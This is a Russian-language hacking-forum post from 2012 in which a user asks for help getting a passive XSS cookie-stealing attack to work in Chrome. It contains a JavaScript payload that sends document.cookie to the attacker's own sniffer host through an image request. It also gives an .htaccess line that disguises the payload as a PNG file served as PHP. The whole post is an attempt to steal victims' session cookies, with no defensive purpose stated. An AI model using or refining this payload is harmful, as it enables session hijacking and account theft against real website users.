HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 20.02.2012, 13:26
LABERT
Новичок
Регистрация: 28.01.2012
Сообщений: 7
С нами: 7520726

Репутация: 0
По умолчанию

Обход пассивка xss Chrome

Видел одну тему:

Код HTML:
Обход Chrome
 и так вместо прямой ссылки на снифер http://s.gif делаем в картинке ядовитый код например 
 img = new Image(); img.src = "http://s.gif?"+document.cookie;
 это мы скрываем расширение .js
 и открываем на хосте файлом .htaccess нашу картинку и кукисы наши .
Делаю так - в .htaccess у меня :AddType application/x-httpd-php .png; Сделал картинку test.png в ней написал код :

img = new Image(); img.src = "http://мой_сниффер/image.png?"+document.cookie; - т.е перенаправляю на мой сниффер.

Но Chrome не "проглатывает" этот ядовитый код в картинке ,если напрямую указать на сниффер, то приходят ВСЕ кроме cookie...

Что я делаю не так ( В Опере все работает через js) срочно нужна помощь ...какой код надо вписать в картинку? и .htaccess?
 
Ответить с цитированием
 



Предыдущая тема Следующая тема

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.